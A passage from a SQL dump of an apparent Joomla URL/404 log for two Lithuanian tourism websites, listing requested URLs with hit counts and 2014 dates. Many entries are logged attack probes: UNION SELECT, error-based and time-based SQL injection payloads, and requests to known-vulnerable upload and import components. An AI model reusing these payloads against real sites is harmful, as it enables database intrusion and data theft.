00:00:00'),(667,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:22','0000-00-00 00:00:00'),(668,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:23','0000-00-00 00:00:00'),(669,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:24','0000-00-00 00:00:00'),(670,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:25','0000-00-00 00:00:00'),(671,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:26','0000-00-00 00:00:00'),(672,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:27','0000-00-00 00:00:00'),(673,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:28','0000-00-00 00:00:00'),(674,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:29','0000-00-00 00:00:00'),(675,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:30','0000-00-00 00:00:00'),(676,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:31','0000-00-00 00:00:00'),(677,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:32','0000-00-00 00:00:00'),(678,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:33','0000-00-00 00:00:00'),(679,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:34','0000-00-00 00:00:00'),(680,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:35','0000-00-00 00:00:00'),(681,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:36','0000-00-00 00:00:00'),(682,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:37','0000-00-00 00:00:00'),(683,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:38','0000-00-00 00:00:00'),(684,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:39','0000-00-00 00:00:00'),(685,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:40','0000-00-00 00:00:00'),(686,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:42','0000-00-00 00:00:00'),(687,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:43','0000-00-00 00:00:00'),(688,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:44','0000-00-00 00:00:00'),(689,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:46','0000-00-00 00:00:00'),(690,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:47','0000-00-00 00:00:00'),(691,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:48','0000-00-00 00:00:00'),(692,'http://www.tytuvenai.eu/index.php?option=com_content and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `informatio','','','',1,0,'2014-08-06 17:30:54','0000-00-00 00:00:00'),(693,'http://www.tytuvenai.eu/index.php?option=com_content and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by ','','','',1,0,'2014-08-06 17:30:57','0000-00-00 00:00:00'),(694,'http://www.tytuvenai.eu/index.php?option=convert(int,db_name()) and 1=1','','','',1,0,'2014-08-06 17:31:01','0000-00-00 00:00:00'),(695,'http://www.tytuvenai.eu/index.php?option=convert(int,db_name())--','','','',1,0,'2014-08-06 17:31:03','0000-00-00 00:00:00'),(696,'http://www.tytuvenai.eu/index.php?option=com_content\' or 1=convert(int,db_name())--','','','',1,0,'2014-08-06 17:31:08','0000-00-00 00:00:00'),(697,'http://www.tytuvenai.eu/index.php?option=com_content; if (1=1) waitfor delay \'00:00:08\'--','','','',1,0,'2014-08-06 17:31:13','0000-00-00 00:00:00'),(698,'http://www.tytuvenai.eu/index.php?option=com_content\'; if (1=1) waitfor delay \'00:00:08\'--','','','',1,0,'2014-08-06 17:31:15','0000-00-00 00:00:00'),(699,'http://www.tytuvenai.eu/index.php?option=com_content and if(1=1,BENCHMARK(14620666,MD5(0x41)),0)','','','',1,0,'2014-08-06 17:31:17','0000-00-00 00:00:00'),(700,'http://www.tytuvenai.eu/index.php?option=com_content\' and if(1=1,BENCHMARK(14620666,MD5(0x41)),0) and \'x\'=\'x','','','',1,0,'2014-08-06 17:31:20','0000-00-00 00:00:00'),(701,'http://www.tytuvenai.eu/index.php?option=com_content\' or 1=convert(int,(select concat(version(),0x7233646D3076335F73716C5F696E6A656374696F6E)))--','','','',1,0,'2014-08-06 17:31:21','0000-00-00 00:00:00'),(702,'http://www.tytuvenai.eu/index.php?option=com_content\' or 1=convert(int,(select cast(Char(114)+Char(51)+Char(100)+Char(109)+Char(48)+Char(118)+Char(51)+Char(95)+Char(104)+Char(118)+Char(106)+Char(95)+Char(105)+Char(110)+Char(106)+Char(101)+Char(99)+Char(11','','','',1,0,'2014-08-06 17:31:24','0000-00-00 00:00:00'),(703,'http://www.tytuvenai.eu/index.php?option=com_content\' or 1=convert(int,chr(114)||chr(51)||chr(100)||chr(109)||chr(48)||chr(118)||chr(51)||chr(95)||chr(104)||chr(118)||chr(106)||chr(95)||chr(105)||chr(110)||chr(106)||chr(101)||chr(99)||chr(116)||chr(105)||','','','',1,0,'2014-08-06 17:31:27','0000-00-00 00:00:00'),(704,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=4','','','',7,0,'2014-08-06 19:07:16','0000-00-00 00:00:00'),(705,'http://www.tytuvenai.eu/index.php/component/content/category/27-sample-data-article/demo/courses/plant-biochemistry','','','',3,0,'2014-08-06 22:02:55','0000-00-00 00:00:00'),(706,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&140809-003109','','','',1,0,'2014-08-08 22:31:09','0000-00-00 00:00:00'),(707,'http://tytuvenai.eu/index.php?option=com_community&view=frontpage&140809-003110','','','',1,0,'2014-08-08 22:31:09','0000-00-00 00:00:00'),(708,'http://tytuvenai.eu/index.php?140809-003110','','','',1,0,'2014-08-08 22:31:09','0000-00-00 00:00:00'),(709,'http://www.tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=83:pradedame-prekiauti-suvenyrais-su-tytuvn-simbolika&option=com_content&view=article','','','',5,0,'2014-08-08 22:36:36','0000-00-00 00:00:00'),(710,'http://tytuvenai.eu/index.php/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',26,0,'2014-08-09 05:37:48','0000-00-00 00:00:00'),(711,'http://tytuvenai.eu//index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2','','','',3,0,'2014-08-10 09:26:04','0000-00-00 00:00:00'),(712,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',21,0,'2014-08-10 09:35:46','0000-00-00 00:00:00'),(713,'http://www.tytuvenai.eu//index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2','','','',5,0,'2014-08-11 03:42:44','0000-00-00 00:00:00'),(714,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=50:kaledu-gele&catid=32:turizmas&Itemid=37','','','',5,0,'2014-08-14 05:24:30','0000-00-00 00:00:00'),(715,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&id=32:turizmas&Itemid=47&layout=default','','','',2,0,'2014-08-16 07:27:09','0000-00-00 00:00:00'),(716,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&140817-102228','','','',1,0,'2014-08-17 08:11:13','0000-00-00 00:00:00'),(717,'http://tytuvenai.eu/index.php?option=com_community&view=frontpage&140817-102231','','','',1,0,'2014-08-17 08:11:14','0000-00-00 00:00:00'),(718,'http://tytuvenai.eu/index.php?140817-102232','','','',1,0,'2014-08-17 08:11:14','0000-00-00 00:00:00'),(719,'http://tytuvenai.eu/index.php?option=com_jdownloads&Itemid=101&view=upload&140817-102232','','','',1,0,'2014-08-17 08:11:14','0000-00-00 00:00:00'),(720,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=56:veriniu-pasaulis&catid=32:turizmas&Itemid=37','','','',3,0,'2014-08-17 11:01:11','0000-00-00 00:00:00'),(721,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=97:pasirayta-finansavimo-sutartis-dl-tytuvn-banyios-ii-etapo-projekto-bei-projekto-rangos-darb-sutartis&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',1,0,'2014-08-17 13:49:52','0000-00-00 00:00:00'),(722,'http://www.infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',3,0,'2014-08-17 20:51:30','0000-00-00 00:00:00'),(723,'http://www.infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b','','','',3,0,'2014-08-17 20:51:31','0000-00-00 00:00:00'),(724,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=100:tytuvn-banyios-ir-vienuolyno-ansamblis&tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-08-18 09:55:11','0000-00-00 00:00:00'),(725,'http://tytuvenai.eu/index.php?view=article&catid=34:naujienos&id=46:pasirasyta-sutartis&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',1,0,'2014-08-18 10:49:00','0000-00-00 00:00:00'),(726,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=2','','','',1,0,'2014-08-19 20:58:33','0000-00-00 00:00:00'),(727,'http://tytuvenai.eu/index.php?option=com_content&view=category&id=32&Itemid=47','','','',1,0,'2014-08-20 18:14:21','0000-00-00 00:00:00'),(728,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=53:nelaime&tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-08-21 08:46:11','0000-00-00 00:00:00'),(729,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=85:europos-paveldo-dienos-2013-qepoch-enklaiq&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-08-21 08:47:21','0000-00-00 00:00:00'),(730,'http://www.tytuvenai.eu/index.php/component/content/article/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',6,0,'2014-08-21 14:57:04','0000-00-00 00:00:00'),(731,'http://www.infotytuvenai.lt/index.php/component/content/category/www.kraziai.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:50:12','0000-00-00 00:00:00'),(732,'http://www.infotytuvenai.lt/index.php/component/content/category/www.akmenuke.puslapiai.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:50:17','0000-00-00 00:00:00'),(733,'http://www.infotytuvenai.lt/index.php/component/content/category/www.kelmesknygynas.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:50:21','0000-00-00 00:00:00'),(734,'http://www.infotytuvenai.lt/index.php/component/content/category/www.kelmevic.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:50:25','0000-00-00 00:00:00'),(735,'http://www.infotytuvenai.lt/index.php/component/content/category/www.kurtuva.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:50:29','0000-00-00 00:00:00'),(736,'http://www.infotytuvenai.lt/index.php/component/content/category/www.miegoklinika.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:50:33','0000-00-00 00:00:00'),(737,'http://www.infotytuvenai.lt/index.php/component/content/category/Tel.','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:50:37','0000-00-00 00:00:00'),(738,'http://www.infotytuvenai.lt/index.php/component/content/category/www.kelmesmuziejus.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:50:41','0000-00-00 00:00:00'),(739,'http://www.infotytuvenai.lt/index.php/component/content/category/www.miskouzeiga.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:50:45','0000-00-00 00:00:00'),(740,'http://www.infotytuvenai.lt/index.php/component/content/category/www.fishery.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:50:53','0000-00-00 00:00:00'),(741,'http://www.infotytuvenai.lt/index.php/component/content/category/www.raganyne.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:51:21','0000-00-00 00:00:00'),(742,'http://www.infotytuvenai.lt/index.php/component/content/category/www.azuoluslenis.eu','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:51:28','0000-00-00 00:00:00'),(743,'http://www.infotytuvenai.lt/index.php/component/content/category/www.5sezonas.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:51:33','0000-00-00 00:00:00'),(744,'http://www.infotytuvenai.lt/index.php/component/content/category/www.kelme.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:51:42','0000-00-00 00:00:00'),(745,'http://www.infotytuvenai.lt/index.php/component/content/category/www.sodybagaja.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:52:06','0000-00-00 00:00:00'),(746,'http://www.infotytuvenai.lt/index.php/component/content/category/www.trp.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:52:10','0000-00-00 00:00:00'),(747,'http://www.infotytuvenai.lt/index.php/component/content/category/www.varniuparkas.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:52:15','0000-00-00 00:00:00'),(748,'http://www.infotytuvenai.lt/index.php/component/content/category/Mob.','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:52:21','0000-00-00 00:00:00'),(749,'http://www.infotytuvenai.lt/index.php/component/content/category/www.tytuvenai.eu','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:52:26','0000-00-00 00:00:00'),(750,'http://www.infotytuvenai.lt/index.php/component/content/category/www.bisonranch-lietuva.com','','http://www.infotytuvenai.lt/index.php/component/content/category/52-turizmas?format=feed&type=rss','',1,0,'2014-08-23 03:52:31','0000-00-00 00:00:00'),(751,'http://www.infotytuvenai.lt/index.php/component/content/category/www.vaikusvajones.lt','','http://www.infotytuvenai.lt/index.php/component/content/category/44-paskutinesnaujienos?format=feed&type=rss','',1,0,'2014-08-23 03:52:40','0000-00-00 00:00:00'),(752,'http://www.infotytuvenai.lt/index.php/component/content/category','','http://www.infotytuvenai.lt/index.php/component/content/category?format=feed&type=atom','',1,0,'2014-08-23 03:54:38','0000-00-00 00:00:00'),(753,'http://www.tytuvenai.eu/index.php?view=article&catid=32:turizmas&id=55','','','',7,0,'2014-08-23 09:17:29','0000-00-00 00:00:00'),(754,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=98:pildome-vaik-svajones&tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-08-23 10:40:07','0000-00-00 00:00:00'),(755,'http://tytuvenai.eu/index.php/component/content/article/14-sample-data-article/demo/portfolio/','','','',6,0,'2014-08-25 01:22:05','0000-00-00 00:00:00'),(756,'http://tytuvenai.eu/index.php/component/content/article/17-sample-data-article/demo/portfolio/2012/','','','',6,0,'2014-08-26 05:20:59','0000-00-00 00:00:00'),(757,'http://tytuvenai.eu/index.php?Itemid=71&id=71&option=com_content&view=article','','','',5,0,'2014-08-28 08:46:34','0000-00-00 00:00:00'),(758,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&140828-155600','','','',1,0,'2014-08-28 13:55:15','0000-00-00 00:00:00'),(759,'http://tytuvenai.eu/index.php?option=com_community&view=frontpage&140828-155601','','','',1,0,'2014-08-28 13:55:16','0000-00-00 00:00:00'),(760,'http://tytuvenai.eu/index.php?140828-155602','','','',1,0,'2014-08-28 13:55:16','0000-00-00 00:00:00'),(761,'http://tytuvenai.eu/index.php?option=com_jdownloads&Itemid=101&view=upload&140828-155602','','','',1,0,'2014-08-28 13:55:16','0000-00-00 00:00:00'),(762,'http://www.tytuvenai.eu/index.php?option=com_content))view=article))id=33))Itemid=27','','','',6,0,'2014-08-29 11:05:05','0000-00-00 00:00:00'),(763,'http://www.tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5a65c1246b5f=9d09f693c63c1988a9f8a564e0da7743','','','',2,0,'2014-09-02 16:31:18','0000-00-00 00:00:00'),(764,'http://infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b','','','',4,0,'2014-09-03 09:59:48','0000-00-00 00:00:00'),(765,'http://infotytuvenai.lt/index.php/component/content/category//images/stories/cx.gif','','','',1,0,'2014-09-03 10:00:04','0000-00-00 00:00:00'),(766,'http://tytuvenai.eu/index.php/component/content/article/18-sample-data-article/demo/portfolio/2013/','','','',5,0,'2014-09-03 11:11:35','0000-00-00 00:00:00'),(767,'http://tytuvenai.eu/index.php/component/content/article/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',2,0,'2014-09-05 14:48:17','0000-00-00 00:00:00'),(768,'http://tytuvenai.eu/index.php/lankytini-objektai/item/','','','',6,0,'2014-09-07 12:54:41','0000-00-00 00:00:00'),(769,'http://tytuvenai.eu/index.php/component/content/article/43-apie-centra/general/','','','',6,0,'2014-09-07 21:15:03','0000-00-00 00:00:00'),(770,'http://infotytuvenai.lt/index.php/component/content/article/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',16,0,'2014-09-10 10:08:02','0000-00-00 00:00:00'),(771,'http://www.tytuvenai.eu/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',116,0,'2014-09-13 11:59:46','0000-00-00 00:00:00'),(772,'http://www.tytuvenai.eu/index.php/i','','http://www.baidu.com','',1,0,'2014-09-20 06:48:59','0000-00-00 00:00:00'),(773,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&140920-175214','','','',1,0,'2014-09-21 00:52:40','0000-00-00 00:00:00'),(774,'http://tytuvenai.eu/index.php?option=com_community&view=frontpage&140920-175215','','','',1,0,'2014-09-21 00:52:40','0000-00-00 00:00:00'),(775,'http://tytuvenai.eu/index.php?140920-175216','','','',1,0,'2014-09-21 00:52:40','0000-00-00 00:00:00'),(776,'http://tytuvenai.eu/index.php?option=com_jdownloads&Itemid=101&view=upload&140920-175217','','','',1,0,'2014-09-21 00:52:42','0000-00-00 00:00:00'),(777,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=62:konkursas-administratoriaus-s-pareigoms-uimti&catid=1:paskutinesnaujienos&Itemid=53','','','',1,0,'2014-09-21 02:12:43','0000-00-00 00:00:00'),(778,'http://www.tytuvenai.eu/index.php/mailto:info@infotytuvenai.lt','','','',3,0,'2014-09-22 07:11:07','0000-00-00 00:00:00'),(779,'http://www.tytuvenai.eu/index.php/javascript:;','','','',1,0,'2014-09-22 07:11:07','0000-00-00 00:00:00'),(780,'http://www.tytuvenai.eu/index.php/apie-centra/mailto:info@infotytuvenai.lt','','','',1,0,'2014-09-22 07:11:09','0000-00-00 00:00:00'),(781,'http://www.tytuvenai.eu/index.php/apie-centra/javascript:;','','','',1,0,'2014-09-22 07:11:09','0000-00-00 00:00:00'),(782,'http://www.infotytuvenai.lt/index.php/mailto:info@infotytuvenai.lt','','','',1,0,'2014-09-22 08:28:25','0000-00-00 00:00:00'),(783,'http://www.infotytuvenai.lt/index.php/javascript:;','','','',1,0,'2014-09-22 08:28:26','0000-00-00 00:00:00'),(784,'http://www.infotytuvenai.lt/index.php/apie-centra/mailto:info@infotytuvenai.lt','','','',1,0,'2014-09-22 08:28:27','0000-00-00 00:00:00'),(785,'http://www.infotytuvenai.lt/index.php/apie-centra/javascript:;','','','',1,0,'2014-09-22 08:28:28','0000-00-00 00:00:00'),(786,'http://tytuvenai.eu/index.php/mailto:info@infotytuvenai.lt','','','',1,0,'2014-09-22 10:10:42','0000-00-00 00:00:00'),(787,'http://tytuvenai.eu/index.php/javascript:;','','','',1,0,'2014-09-22 10:10:43','0000-00-00 00:00:00'),(788,'http://tytuvenai.eu/index.php/apie-centra/mailto:info@infotytuvenai.lt','','','',1,0,'2014-09-22 10:10:44','0000-00-00 00:00:00'),(789,'http://tytuvenai.eu/index.php/apie-centra/javascript:;','','','',1,0,'2014-09-22 10:10:45','0000-00-00 00:00:00'),(790,'http://www.tytuvenai.eu//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',11,0,'2014-09-22 14:41:43','0000-00-00 00:00:00'),(791,'http://tytuvenai.eu/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,4,5,group_concat(0x3C6B65793E,version(),0x3C6B6579733E)--','','','',1,0,'2014-09-25 13:10:58','0000-00-00 00:00:00'),(792,'http://www.infotytuvenai.lt/index.php/lankytini-objektai/muziejai//','','','',1,0,'2014-09-27 16:09:44','0000-00-00 00:00:00'),(793,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apie-centra/istatai','','','',2,0,'2014-09-27 20:36:11','0000-00-00 00:00:00'),(794,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/aktyvus-poilsis//','','','',1,0,'2014-09-27 21:00:12','0000-00-00 00:00:00'),(795,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/programos','','','',1,0,'2014-09-27 21:28:49','0000-00-00 00:00:00'),(796,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apie-centra/ekskursijos//','','','',1,0,'2014-09-27 21:35:55','0000-00-00 00:00:00'),(797,'http://www.infotytuvenai.lt/index.php/apie-centra/suvenyrai//','','','',1,0,'2014-09-27 21:39:34','0000-00-00 00:00:00'),(798,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/varniu-regioninis-parkas','','','',2,0,'2014-09-27 21:53:34','0000-00-00 00:00:00'),(799,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apie-centra/paslaugos','','','',2,0,'2014-09-27 21:56:15','0000-00-00 00:00:00'),(800,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/lankytini-objektai/kulturos-paveldo-objektai','','','',2,0,'2014-09-27 22:16:07','0000-00-00 00:00:00'),(801,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/tytuvenu-festivalis/galerija','','','',1,0,'2014-09-27 22:17:11','0000-00-00 00:00:00'),(802,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/programos//','','','',1,0,'2014-09-27 22:26:09','0000-00-00 00:00:00'),(803,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apie-centra/galerija//','','','',1,0,'2014-09-27 22:35:18','0000-00-00 00:00:00'),(804,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apie-centra/veiklos-strategija','','','',2,0,'2014-09-27 22:48:27','0000-00-00 00:00:00'),(805,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/apie-centra/veiklos-strategija//','','','',1,0,'2014-09-27 22:57:15','0000-00-00 00:00:00'),(806,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/suvenyrai//','','','',1,0,'2014-09-27 23:08:43','0000-00-00 00:00:00'),(807,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apie-centra/edukacines-programos','','','',2,0,'2014-09-27 23:18:31','0000-00-00 00:00:00'),(808,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/13-sample-data-article/demo/features/31-renginiai','','','',2,0,'2014-09-27 23:22:27','0000-00-00 00:00:00'),(809,'http://www.infotytuvenai.lt/index.php/index.php/turizmo-informacija/turizmo-marsrutai//','','','',1,0,'2014-09-27 23:26:12','0000-00-00 00:00:00'),(810,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/pasiulymai','','','',2,0,'2014-09-27 23:55:16','0000-00-00 00:00:00'),(811,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apie-centra/darbo-uzmokestis','','','',2,0,'2014-09-28 00:25:37','0000-00-00 00:00:00'),(812,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/lankytini-objektai/muziejai','','','',1,0,'2014-09-28 00:31:53','0000-00-00 00:00:00'),(813,'http://www.infotytuvenai.lt/index.php/index.php/tytuvenu-festivalis/programos//','','','',1,0,'2014-09-28 00:42:33','0000-00-00 00:00:00'),(814,'http://www.infotytuvenai.lt/index.php/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas//','','','',1,0,'2014-09-28 00:54:28','0000-00-00 00:00:00'),(815,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/tytuvenu-festivalis/naujienos//','','','',1,0,'2014-09-28 01:22:57','0000-00-00 00:00:00'),(816,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/gido-paslaugos','','','',2,0,'2014-09-28 01:38:01','0000-00-00 00:00:00'),(817,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/apie-centra/parama','','','',2,0,'2014-09-28 01:50:53','0000-00-00 00:00:00'),(818,'http://www.infotytuvenai.lt/index.php/44-paskutinesnaujienos/index.php/turizmo-informacija/turizmo-marsrutai//','','','',1,0,'2014-09-28 01:54:56','0000-00-00 00:00:00'),(819,'http://www.infotytuvenai.lt/index.php/tytuvenu-festivalis/index.php/turizmo-informacija/kurtuvenu-regioninis-parkas','','','',2,0,'2014-09-28 01:57:47','0000-00-00 